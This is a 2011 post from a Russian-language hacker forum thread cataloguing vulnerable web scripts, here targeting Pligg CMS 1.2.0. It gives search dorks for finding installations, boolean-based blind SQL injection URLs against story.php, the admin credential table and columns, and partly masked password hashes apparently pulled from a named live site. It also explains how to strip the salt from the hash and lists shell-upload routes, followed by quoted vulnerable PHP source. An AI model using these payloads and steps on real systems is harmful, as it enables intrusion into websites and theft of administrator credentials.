Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #2  
Старый 06.11.2011, 16:26
Unknown
Guest
Сообщений: n/a
Провел на форуме:
4100

Репутация: 74
По умолчанию
Pligg CMSv.1.2.0 (последняя) g00gle >7KK

dorki:

Pligg Content Management System

Pligg CMS

Boolean-Based vurnel

Код:
Code:
http://pligg/story.php?title=qwe' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),CHAR(32)) FROM information_schema.COLUMNS WHERE table_name=CHAR(116,97,103,115) AND table_schema=CHAR(119,101,98,49,95,100,98,53)),2,1)) > 1 AND 'AOOt'='AOOt
Код:
Code:
http://pligg/story.php?title=qwe' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),CHAR(32)) FROM information_schema.COLUMNS WHERE table_name=CHAR(116,97,103,115) AND table_schema=CHAR(119,101,98,49,95,100,98,53)),1,1)) > 51 AND 'AOOt'='AOOt
Код:
Code:
http://pligg/story.php?title=qwe' AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),CHAR(32)) FROM information_schema.COLUMNS WHERE table_name=CHAR(116,97,103,115) AND table_schema=CHAR(119,101,98,49,95,100,98,53)),1,1)) > 52 AND 'AOOt'='AOOt
Цитата:
Сообщение от None  
Таблицы:

prefix: pligg_

table: users

columns: user_login,user_pass (where user_level='god')
for example

Цитата:
Сообщение от None  
www.proprofs.com

Alexa 10K (~100K unikov)
Код:
Code:
god, ***************809b221f581cdbba8c1489e******
james, ****************91acf54adcea0b79a79d******
gsbaghel, ***************f5ecb878f4d045e5306c2413c******
С хэшами тут так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]generateHash[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$plainText[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]){

 if ([/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]uniqid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])),[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]SALT_LENGTH[/COLOR][COLOR="#007700"]); }

 else {

[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]SALT_LENGTH[/COLOR][COLOR="#007700"]);

}

return[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plainText[/COLOR][COLOR="#007700"]);

}[/COLOR][/COLOR
Вообщем отсекаем первые 9 символов хэша (из 49) - и они же являются солью в оставшихся 40 символах (уже SHA1)
Shell Upload

Цитата:
Сообщение от None  
Заливаемся через:

1) модули

2) редактирование тем
vurnel code

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$my_base_url[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'my_base_url'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"http://"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"HTTP_HOST"[/COLOR][COLOR="#007700"]]);

 if(isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]])){[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sanit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]]);}else{[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];}

[/COLOR][COLOR="#0000BB"]$pos[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strrpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"SCRIPT_NAME"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"SCRIPT_NAME"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pos[/COLOR][COLOR="#007700"]);

 if ([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];}

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'my_pligg_base'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$my_pligg_base[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'my_base_url'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$my_base_url[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'my_pligg_base'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$my_pligg_base[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'urlmethod'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$URLMethod[/COLOR][COLOR="#007700"]);

if(isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]])){

[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sanit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]]));

}

[/COLOR][COLOR="#FF8000"]// template check

[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/pligg.tpl"[/COLOR][COLOR="#007700"];

unset([/COLOR][COLOR="#0000BB"]$errors[/COLOR][COLOR="#007700"]);

if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$errors[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#DD0000"]'You may have typed the template name wrong or "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'" does not exist. Click here to fix it.'[/COLOR][COLOR="#007700"]; }

if (isset([/COLOR][COLOR="#0000BB"]$errors[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"wistie"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]dirname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$thetemp[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/pligg.tpl"[/COLOR][COLOR="#007700"];

 if (![/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])) {echo[/COLOR][COLOR="#DD0000"]'The default Wistie template does not exist anymore. Please fix this by reuploading the Wistie template!'[/COLOR][COLOR="#007700"]; die();}

 foreach ([/COLOR][COLOR="#0000BB"]$errors[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Error:[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"];

 }



if ([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SCRIPT_NAME'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"admin_config.php"[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SCRIPT_NAME'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"login.php"[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){

 echo[/COLOR][COLOR="#DD0000"]"Error:[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"];

 die();

 }

}[/COLOR][/COLOR
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#DD0000"]'profile'[/COLOR][COLOR="#007700"];

 if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'setting'[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$truelogin[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'profile'[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$page_header[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$post_title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_Breadcrumb_Profile'[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user_view'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]);

 if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'profile'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]do_viewfriends[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_href'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_pd'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);

 } else {

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_pd'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]);

 }

 if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'voted'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$page_header[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' | '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsVoted'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$navwhere[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text3'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsVoted'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$post_title[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsVoted'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_href'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'voted'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_nv'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);

 } else {

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_nv'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]);

 }

if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'history'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$page_header[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]' | '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsSent'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$navwhere[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text3'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsSent'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$post_title[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]" | "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_config_vars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'PLIGG_Visual_User_NewsSent'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_href'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'submitted'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_ns'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);

 } else {

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_ns'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]);

 }

 if ([/COLOR][COLOR="#0000BB"]$view[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'setting'[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$usercategorysql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]table_users[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" where user_login = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"' "[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$userresults[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_results[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$usercategorysql[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$userresults[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]object_2_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$userresults[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$get_categories[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$userresults[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'0'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'user_categories'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$user_categories[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$get_categories[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$categorysql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]table_categories[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" where category__auto_id!='0' "[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_results[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$categorysql[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]object_2_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]= array();

 foreach([/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category_name'[/COLOR][COLOR="#007700"]];

}

[/COLOR][COLOR="#0000BB"]$sor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'err'[/COLOR][COLOR="#007700"]];

 if([/COLOR][COLOR="#0000BB"]$sor[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"You have to select at least 1 category"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'err'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$results[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user_category'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user_categories[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_href'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'submitted'[/COLOR][COLOR="#007700"]);

 if ([/COLOR][COLOR="#0000BB"]Allow_User_Change_Templates[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"templates"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$templates[/COLOR][COLOR="#007700"]= array();

 foreach ([/COLOR][COLOR="#0000BB"]scandir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#007700"]) as[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])

 if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"])!==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$dir[/COLOR][COLOR="#DD0000"]/[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#DD0000"]/header.tpl"[/COLOR][COLOR="#007700"]))

[/COLOR][COLOR="#0000BB"]$templates[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'templates'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$templates[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'current_template'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Allow_User_Change_Templates'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]Allow_User_Change_Templates[/COLOR][COLOR="#007700"]);

 }

[/COLOR][COLOR="#0000BB"]$main_smarty[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'nav_set'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// check for redirects

[/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#0000BB"]mnminclude[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'redirector.php'[/COLOR][COLOR="#007700"]);

